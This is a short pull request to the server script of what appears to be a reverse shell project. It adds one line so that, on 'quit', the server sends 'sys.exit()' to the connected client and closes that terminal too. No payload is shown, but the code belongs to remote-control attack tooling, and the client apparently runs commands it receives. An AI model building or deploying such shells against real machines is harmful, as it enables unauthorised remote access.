### PR TITLE
closing client terminal also

### DIFF
--- a/Single_Client ( ReverseShell v1)/server.py
+++ b/Single_Client ( ReverseShell v1)/server.py
@@ -45,6 +45,7 @@ def send_commands(conn):
     while True:
         cmd = input()
         if cmd == 'quit':
+            conn.send(str.encode('sys.exit()'))         # Ensuring Client Terminal is also closed
             conn.close()
             s.close()
             sys.exit()


### PR DESCRIPTION
Above code only closes server terminal but client terminal remains unclosed
so the above added line can close client also